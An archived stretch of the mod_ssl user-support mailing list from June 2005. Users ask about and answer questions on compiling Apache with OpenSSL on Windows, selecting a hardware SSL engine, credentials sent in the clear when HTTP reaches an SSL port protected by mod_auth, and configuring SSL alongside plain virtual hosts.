        cd modules\ssl
        NMAKE -nologo -f mod_ssl.mak       =20
CFG=3D"mod_ssl - Win32 Release" RECURSE=3D0 .\Release\mod_ssl.so NMAKE : =
fatal error U1073: don't know how to make =
'"..\..\srclib\openssl\inc32\openssl\asn1.h"'
Stop.
NMAKE : fatal error U1077: '"C:\Program
Files\Microsoft Visual Studio\VC98\bin\NMAKE.EXE"' :
return code '0x2'
Stop.
NMAKE : fatal error U1077: '"C:\Program
Files\Microsoft Visual Studio\VC98\bin\NMAKE.EXE"' :
return code '0x2'
Stop.

C:\Documents and Settings\brad\Desktop\httpd-2.0.54>
----------------------------

everything was working perfectly and I thought I was following all the =
instructions properly. =20

What did I forget to do or can anyone tell me what is wrong?  I ask here =
because it seems to be in the mod_ssl portion at that time.  Please let =
me know if there is a more appropriate place to ask.

(And I know it's rude to ask, but please cc me in any
responses)

thanks
b.

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around =
http://mail.yahoo.com =
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  3 22:28:22 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 814B314D9CE; Fri,  3 Jun 2005 22:28:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51507.mail.yahoo.com (web51507.mail.yahoo.com [206.190.38.199])
	by master.modssl.org (Postfix) with SMTP id 0AEC914D9C7
	for ; Fri,  3 Jun 2005 22:28:21 +0200 (CEST)
Received: (qmail 95183 invoked by uid 60001); 3 Jun 2005 20:28:19 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=d6DwdFOPqe9mwFMKlXLXUAbnzrC7NETLXMYhZj5p+VWgmwvXmtRSPYt36CL9ULPDPfcYZhmpLO0bWCOEy5rRAHLQgZ6HeJBBsAFJXA9cyVkQtW0iPOSzMI61H5jBKzqmAjaigu28z08vp8PthySqI5wFhjn1OEyE3c5WNwmTpvo=  ;
Message-ID: <20050603202819.95181.qmail@web51507.mail.yahoo.com>
Received: from [199.231.49.128] by web51507.mail.yahoo.com via HTTP; Fri, 03 Jun 2005 13:28:19 PDT
Date: Fri, 3 Jun 2005 13:28:19 -0700 (PDT)
From: b h 
Subject: RE: problem compiling on windows
To: modssl-users@modssl.org
In-Reply-To: <85ECA15B7BB46944BFD4C73AEA55482402D4696C@cacexc07.americas.cpqcorp.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: b h 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi Bill

that was the answer.  Thanks!

bob


--- "Lange, Bill Charles"  wrote:

> Hi,
> You might be running into the same thing I did a
> while back with the /win_compiling.html" 
> instructions.
> You might try the following variation:
> 
> 1) The instructions for running the perl scripts to
> build openssl are a little unclear,
> so please note the following:
> a) First you untar the openssl so that the openssl
> source tree is in the
>    srclib/openssl directory.
> b) You must cd into the the srclib/openssl
> directory,
>    then execute the perl scripts as described.
> 
> 2) On windows you can't execute the command exactly
> as printed in
>    the win_compiling.html and as shown below:
> 
> perl util\mk1mf.pl dll no-asm no-mdc2 no-rc5 no-idea
> VC-WIN32 >makefile
> 
> 3) Because windows does not distinguish "makefile"
> from "Makefile" this
>    command will overwrite the "Makefile" that is
> previously configured
>    and required for this step.
> 
>    You must direct the output to another filename,
> e.g.
>    perl util\mk1mf.pl dll no-asm no-mdc2 no-rc5
> no-idea VC-WIN32 >makefile.rel
> 
>    then "nmake /f makefile.rel" for the release
> build.
> 
> Regards,
> Bill Lange
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of
> Michael.Straessle@bk.admin.ch
> Sent: Friday, June 03, 2005 1:27 AM
> To: modssl-users@modssl.org
> Subject: Re: problem compiling on windows
> 
> I suggest you follow the procedure in the openssl
> source package
> (install.w32) instead of using the perl commands in
> the apache httpd documentation. This worked fine for
> me.
> 
> HTH
> michael
> 
> 
> -----Ursprüngliche Nachricht-----
> Von: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] Im Auftrag
> von b h
> Gesendet: Freitag, 3. Juni 2005 00:34
> An: modssl-users@modssl.org
> Betreff: problem compiling on windows
> 
> 
> 
> Hi
> 
> to begin, platform winxp pro, visual studio 6
> 
> I downloaded and extracted
> httpd-2.0.54-win32-src.zip, openssl-0.9.7g.tar.gz
> from their respective websites. 
> And I was following
>
http://httpd.apache.org/docs-2.0/platform/win_compiling.html
> 
> I placed awk.exe in the path, extracted all the
> openssl files into srclib/openssl, ran all the perl
> lines configuring, and nmaking in the srclib/openssl
> directory (and they seemed to work without any
> error)...
> 
> but then when running 
> 
> nmake /f Makefile.win _apacher
> 
> after a couple minutes I end up with fatal errors: 
> see last few lines before the error following...
> 
> -----------------------------
>    Creating library .\Release\mod_proxy.lib and
> object .\Release\mod_proxy.exp
>         NMAKE -nologo -f mod_proxy_connect.mak
> CFG="mod_proxy_connect -
> Win32 Release" RECURSE=0
>         tempfile.bat
>         cl.exe
> @C:\DOCUME~1\brad\LOCALS~1\Temp\nma00480.
> proxy_connect.c
>         link.exe
> @C:\DOCUME~1\brad\LOCALS~1\Temp\nmb00480.
>    Creating library .\Release\mod_proxy_connect.lib
> and object .\Release\mod_proxy_connect.exp
>         NMAKE -nologo -f mod_proxy_ftp.mak
> CFG="mod_proxy_ftp - Win32 Release" RECURSE=0
>         tempfile.bat
>         cl.exe
> @C:\DOCUME~1\brad\LOCALS~1\Temp\nma03996.
> proxy_ftp.c
>         link.exe
> @C:\DOCUME~1\brad\LOCALS~1\Temp\nmb03996.
>    Creating library .\Release\mod_proxy_ftp.lib and
> object .\Release\mod_proxy_ftp.exp
>         NMAKE -nologo -f mod_proxy_http.mak
> CFG="mod_proxy_http - Win32 Release" RECURSE=0
>         tempfile.bat
>         cl.exe
> @C:\DOCUME~1\brad\LOCALS~1\Temp\nma01708.
> proxy_http.c
>         link.exe
> @C:\DOCUME~1\brad\LOCALS~1\Temp\nmb01708.
>    Creating library .\Release\mod_proxy_http.lib and
> object .\Release\mod_proxy_http.exp
>         cd ..\..
>         cd modules\ssl
>         NMAKE -nologo -f mod_ssl.mak        
> CFG="mod_ssl - Win32 Release" RECURSE=0
> .\Release\mod_ssl.so NMAKE : fatal error U1073:
> don't know how to make
> '"..\..\srclib\openssl\inc32\openssl\asn1.h"'
> Stop.
> NMAKE : fatal error U1077: '"C:\Program
> Files\Microsoft Visual Studio\VC98\bin\NMAKE.EXE"' :
> return code '0x2'
> Stop.
> NMAKE : fatal error U1077: '"C:\Program
> Files\Microsoft Visual Studio\VC98\bin\NMAKE.EXE"' :
> return code '0x2'
> Stop.
> 
> C:\Documents and Settings\brad\Desktop\httpd-2.0.54>
> ----------------------------
> 
> everything was working perfectly and I thought I was
> following all the instructions properly.  
> 
> What did I forget to do or can anyone tell me what
> is wrong?  I ask here because it seems to be in the
> mod_ssl portion at that time.  Please let me know if
> there is a more appropriate place to ask.
> 
> (And I know it's rude to ask, but please cc me in
> any
> responses)
> 
> thanks
> b.
> 
> __________________________________________________
> Do You Yahoo!?
> Tired of spam?  Yahoo! Mail has the best spam
> protection around http://mail.yahoo.com
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun  4 09:17:31 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 42B9B14D9D2; Sat,  4 Jun 2005 09:17:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web8307.mail.in.yahoo.com (web8307.mail.in.yahoo.com [202.43.219.219])
	by master.modssl.org (Postfix) with SMTP id 8203F14D992
	for ; Sat,  4 Jun 2005 09:17:27 +0200 (CEST)
Received: (qmail 79320 invoked by uid 60001); 4 Jun 2005 07:17:25 -0000
Message-ID: <20050604071725.79318.qmail@web8307.mail.in.yahoo.com>
Received: from [61.247.245.40] by web8307.mail.in.yahoo.com via HTTP; Sat, 04 Jun 2005 00:17:25 PDT
Date: Sat, 4 Jun 2005 00:17:25 -0700 (PDT)
From: Horthik 
Subject: How to interfacing apache1.3.3 and SSLaccelerationcard
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Horthik 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

hi,

 I am writting an interface for a SSLHardware
accelerator.I gave its Engine ID xxxx, I also written
hw_xxxx.c and it is working fine with the
openssl0.9.7g, Also I tested with,

  openssl speed -engine xxxx

  Now I tried to use openssl0.9.7g with my code to
work with apache1.3.3. It always calling default
openssl engine not my engine with id xxxx. I am using 

-Apache1.3.3
-mod_ssl2.8.22-1.3.3
-openssl0.9.7g(In which I added intercface to my
hardware)

  can any one tell where to add apache or mod_ssl to
switch from default openssl engine to my xxxx engine. 

Thanks in advance

-karthik

  


		
__________________________________ 
Discover Yahoo! 
Stay in touch with email, IM, photo sharing and more. Check it out! 
http://discover.yahoo.com/stayintouch.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun  4 12:10:48 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3971114D9D1; Sat,  4 Jun 2005 12:10:48 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web307.biz.mail.mud.yahoo.com (web307.biz.mail.mud.yahoo.com [68.142.199.183])
	by master.modssl.org (Postfix) with SMTP id 8A87714D992
	for ; Sat,  4 Jun 2005 12:10:46 +0200 (CEST)
Message-ID: <20050604101043.22775.qmail@web307.biz.mail.mud.yahoo.com>
Received: from [59.93.163.45] by web307.biz.mail.mud.yahoo.com via HTTP; Sat, 04 Jun 2005 03:10:43 PDT
Date: Sat, 4 Jun 2005 03:10:43 -0700 (PDT)
From: Bibhash Roy 
Subject: Re: How to interfacing apache1.3.3 and SSLaccelerationcard
To: modssl-users@modssl.org
In-Reply-To: 6667
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bibhash Roy 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

You may try the following section in /etc/httpd/conf.d/ssl.conf:
# Use "SSLCryptoDevice" to enable any supported hardware
SSLCryptoDevice builtin


Instead of "bulitin" give the name of your device.



--- Horthik  wrote:
> hi,
> 
>  I am writting an interface for a SSLHardware
> accelerator.I gave its Engine ID xxxx, I also written
> hw_xxxx.c and it is working fine with the
> openssl0.9.7g, Also I tested with,
> 
>   openssl speed -engine xxxx
> 
>   Now I tried to use openssl0.9.7g with my code to
> work with apache1.3.3. It always calling default
> openssl engine not my engine with id xxxx. I am using 
> 
> -Apache1.3.3
> -mod_ssl2.8.22-1.3.3
> -openssl0.9.7g(In which I added intercface to my
> hardware)
> 
>   can any one tell where to add apache or mod_ssl to
> switch from default openssl engine to my xxxx engine. 
> 
> Thanks in advance
> 
> -karthik
> 
>   
> 
> 
> 		
> __________________________________ 
> Discover Yahoo! 
> Stay in touch with email, IM, photo sharing and more. Check it out! 
> http://discover.yahoo.com/stayintouch.html
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun  4 12:13:22 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6971F14D9D2; Sat,  4 Jun 2005 12:13:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web305.biz.mail.mud.yahoo.com (web305.biz.mail.mud.yahoo.com [68.142.199.181])
	by master.modssl.org (Postfix) with SMTP id B9B2F14D9A8
	for ; Sat,  4 Jun 2005 12:13:21 +0200 (CEST)
Message-ID: <20050604101320.95811.qmail@web305.biz.mail.mud.yahoo.com>
Received: from [59.93.163.45] by web305.biz.mail.mud.yahoo.com via HTTP; Sat, 04 Jun 2005 03:13:19 PDT
Date: Sat, 4 Jun 2005 03:13:19 -0700 (PDT)
From: Bibhash Roy 
Subject: Re: How to interfacing apache1.3.3 and SSLaccelerationcard
To: modssl-users@modssl.org
In-Reply-To: 6667
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bibhash Roy 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hope the earlier tip worked.
However I have not written any interface for SSLHardware accelerator....
Can you share the code and HOW-TOs of it?

Regards

--- Horthik  wrote:
> hi,
> 
>  I am writting an interface for a SSLHardware
> accelerator.I gave its Engine ID xxxx, I also written
> hw_xxxx.c and it is working fine with the
> openssl0.9.7g, Also I tested with,
> 
>   openssl speed -engine xxxx
> 
>   Now I tried to use openssl0.9.7g with my code to
> work with apache1.3.3. It always calling default
> openssl engine not my engine with id xxxx. I am using 
> 
> -Apache1.3.3
> -mod_ssl2.8.22-1.3.3
> -openssl0.9.7g(In which I added intercface to my
> hardware)
> 
>   can any one tell where to add apache or mod_ssl to
> switch from default openssl engine to my xxxx engine. 
> 
> Thanks in advance
> 
> -karthik
> 
>   
> 
> 
> 		
> __________________________________ 
> Discover Yahoo! 
> Stay in touch with email, IM, photo sharing and more. Check it out! 
> http://discover.yahoo.com/stayintouch.html
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun  4 23:07:28 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5F91C14D9AB; Sat,  4 Jun 2005 23:07:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from krautesel.30hopsmax.at (30hopsmax.at [194.152.184.205])
	by master.modssl.org (Postfix) with ESMTP id 2B52514D9A8
	for ; Sat,  4 Jun 2005 23:07:27 +0200 (CEST)
Received: from hop by krautesel.30hopsmax.at with local (Exim 3.36 #1 (Debian))
	id 1Defrb-0004S2-00
	for ; Sat, 04 Jun 2005 23:07:27 +0200
Date: Sat, 4 Jun 2005 23:07:27 +0200
To: modssl-users@modssl.org
Subject: mod_ssl with mod_auth
Message-ID: <20050604210727.GC5288@mail.30hopsmax.at>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.9i
From: Christoph Schindler 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christoph Schindler 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi!

I've come across the following:

1. Configure Apache (1.3.33 in this case) to listen with SSL on some
   port (say 8100).

2. Protect it with mod_auth.

3. Connect to the port with a Web Browser using http:// (not https://!)
        http://ssl.example.com:8100/

You get the following in error.log:

  [Fri Jun  3 14:47:46 2005] [error] mod_ssl: SSL handshake failed: HTTP
  spoken on HTTPS port; trying to send HTML error page...

What Apache actually sends though, is a "401 Authorization Required", so
you also get the authentication dialog in the web browser.

If you now fill in your Credentials and click the "OK" button your username
and password is sent to the server in the clear.

The problem with this is, that the user has no actual feedback that he
has entered a wrong URL and that the connection to the server is not
actually encrypted.

An immidiate fix is to SSLRequireSSL, which has the problem that the
user does not get the helpful 400 error with the correct link.

(I worked around this by using ErrorDocument to redirect the user
immediatly to the correct URL... ugly hack, I think.)

Is there some (easy) way around this problem that I have not found? Is
this even something mod_ssl can influence or must this be fixed in
mod_auth?

thanks!
Christoph Schindler


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  6 15:49:29 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7742414D9D3; Mon,  6 Jun 2005 15:49:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wproxy.gmail.com (wproxy.gmail.com [64.233.184.199])
	by master.modssl.org (Postfix) with ESMTP id 0CFE214D99B
	for ; Mon,  6 Jun 2005 15:49:28 +0200 (CEST)
Received: by wproxy.gmail.com with SMTP id 69so1826898wri
        for ; Mon, 06 Jun 2005 06:49:27 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=QqScqHudfQGKeE+UOHoCETW7ppD1F+YYpuP5y+IJl4DsLE71RPmbhRkItBRsypDXZ7tPkM13+f0r8dVw/meoYyGKqdLsGNwpj3VRKGkBQhGCjd3O7asegPKl4n7S3n4ZZ/glDjca0MBvXNglZHkjXlLCrbmctnG88IPeEa+rjRM=
Received: by 10.54.128.20 with SMTP id a20mr2799552wrd;
        Mon, 06 Jun 2005 06:49:27 -0700 (PDT)
Received: by 10.54.53.21 with HTTP; Mon, 6 Jun 2005 06:49:27 -0700 (PDT)
Message-ID: <25274f4605060606492b1effcd@mail.gmail.com>
Date: Mon, 6 Jun 2005 08:49:27 -0500
From: "Darryl W. DeLao Jr." 
To: modssl-users@modssl.org
Subject: Apache and SSL
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Darryl W. DeLao Jr." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am running Apache 2.0.46 on RHEL 3.0 ES. I have about 8 virtualhosts
using port 80. I want to add a virtualhost for port 443. I have the
key installed, etc. When I add a virtualhost for this SSL site in my
ssl.conf, it works. However, all the other port 80 sites now no longer
work. Any help is greatly appreciated.

Thanks,
Darryl
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  6 17:32:06 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 497B414D9D3; Mon,  6 Jun 2005 17:32:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtpgate.vicr.com (smtpgate.vicr.com [207.141.187.5])
	by master.modssl.org (Postfix) with ESMTP id 360AA14D99B
	for ; Mon,  6 Jun 2005 17:32:04 +0200 (CEST)
Received: from 25exch1.vicorpower.vicr.com ([172.20.20.30]) by exchgate.vicorpower.vicr.com with Microsoft SMTPSVC(5.0.2195.6713);
	 Mon, 6 Jun 2005 11:32:01 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.0.6603.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Apache and SSL
Date: Mon, 6 Jun 2005 11:32:01 -0400
Message-ID: <4001DEAF7DF9BD498B58B45051FBEA65028A1177@25exch1.vicorpower.vicr.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Apache and SSL
Thread-Index: AcVqnqzhrvix1SM+T4ihAIgZJNk6AAADc6Fw
From: "Waller, Lonie" 
To: 
X-OriginalArrivalTime: 06 Jun 2005 15:32:01.0244 (UTC) FILETIME=[E23C29C0:01C56AAC]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Waller, Lonie" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

Try putting all virtual host in the ssl.conf file. For the non ssl hosts
make sure sslengine is off. Let me know if this works if you have not
already tried it.

Thanks=20

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Darryl W. DeLao Jr.
Sent: Monday, June 06, 2005 9:49 AM
To: modssl-users@modssl.org
Subject: Apache and SSL

I am running Apache 2.0.46 on RHEL 3.0 ES. I have about 8 virtualhosts
using port 80. I want to add a virtualhost for port 443. I have the key
installed, etc. When I add a virtualhost for this SSL site in my
ssl.conf, it works. However, all the other port 80 sites now no longer
work. Any help is greatly appreciated.

Thanks,
Darryl
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  6 22:24:58 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9B09314D9DC; Mon,  6 Jun 2005 22:24:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pdtnetworks.net (mail.pdtnetworks.org [63.150.168.108])
	by master.modssl.org (Postfix) with ESMTP id 9B1D414D9C1
	for ; Mon,  6 Jun 2005 22:24:55 +0200 (CEST)
Received: from GRACE [204.144.131.66] by pdtnetworks.net with ESMTP
  (SMTPD32-7.07) id A11519CD00A4; Mon, 06 Jun 2005 14:24:53 -0600
Received: from 127.0.0.1 (AVG SMTP 7.0.323 [267.6.2]); Mon, 06 Jun 2005 14:25:21 -0600
Message-ID: <02df01c56ad5$dced3a80$0700a8c0@GRACE>
From: "YL" 
To: 
References: <4001DEAF7DF9BD498B58B45051FBEA65028A1177@25exch1.vicorpower.vicr.com>
Subject: Re: Apache and SSL
Date: Mon, 6 Jun 2005 14:25:21 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "YL" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I finally got a solution. Just wondering why such a typical problem not been
answered before... (In you httpd.conf):

Listen 80
Listen 443

#.......


# put your secure virtualhosts here:
NameVirtualHost *:443

ServerName yourDomain
SSLEngine On
SSLCertificatedFile conf/ssl/my-server.cert
SSLCertificateKeyFiule conf/ssl/my-server.key
DocumentRoot "C:/Apache/htdocs/myWebRoot"

#... more secure virtualhosts....

# put your non-secure virtualhosts here:
NameVirtualHost *:80
#.... put the specification of each non-secure hosts here using the same logic
above.





----- Original Message ----- 
From: "Waller, Lonie" 
To: 
Sent: Monday, June 06, 2005 9:32 AM
Subject: RE: Apache and SSL


Hello,

Try putting all virtual host in the ssl.conf file. For the non ssl hosts
make sure sslengine is off. Let me know if this works if you have not
already tried it.

Thanks

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Darryl W. DeLao Jr.
Sent: Monday, June 06, 2005 9:49 AM
To: modssl-users@modssl.org
Subject: Apache and SSL

I am running Apache 2.0.46 on RHEL 3.0 ES. I have about 8 virtualhosts
using port 80. I want to add a virtualhost for port 443. I have the key
installed, etc. When I add a virtualhost for this SSL site in my
ssl.conf, it works. However, all the other port 80 sites now no longer
work. Any help is greatly appreciated.

Thanks,
Darryl
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



-- 
No virus found in this incoming message.
Checked by AVG Anti-Virus.
Version: 7.0.323 / Virus Database: 267.6.2 - Release Date: 6/4/2005


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  7 08:09:37 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DCF3914D9DB; Tue,  7 Jun 2005 08:09:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web302.biz.mail.mud.yahoo.com (web302.biz.mail.mud.yahoo.com [68.142.199.178])
	by master.modssl.org (Postfix) with SMTP id 16B7A14D9C1
	for ; Tue,  7 Jun 2005 08:09:36 +0200 (CEST)
Message-ID: <20050607060935.89477.qmail@web302.biz.mail.mud.yahoo.com>
Received: from [59.93.165.232] by web302.biz.mail.mud.yahoo.com via HTTP; Mon, 06 Jun 2005 23:09:34 PDT
Date: Mon, 6 Jun 2005 23:09:34 -0700 (PDT)
From: Bibhash Roy 
Subject: Re: Apache and SSL
To: modssl-users@modssl.org
In-Reply-To: 6667
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bibhash Roy 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Are you using name-based or ip-based VirtualHosts?



--- "Darryl W. DeLao Jr."  wrote:
> I am running Apache 2.0.46 on RHEL 3.0 ES. I have about 8 virtualhosts
> using port 80. I want to add a virtualhost for port 443. I have the
> key installed, etc. When I add a virtualhost for this SSL site in my
> ssl.conf, it works. However, all the other port 80 sites now no longer
> work. Any help is greatly appreciated.
> 
> Thanks,
> Darryl
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  7 08:17:20 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DA42014D9DC; Tue,  7 Jun 2005 08:17:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web304.biz.mail.mud.yahoo.com (web304.biz.mail.mud.yahoo.com [68.142.199.180])
	by master.modssl.org (Postfix) with SMTP id 285AB14D9C1
	for ; Tue,  7 Jun 2005 08:17:19 +0200 (CEST)
Message-ID: <20050607061718.30063.qmail@web304.biz.mail.mud.yahoo.com>
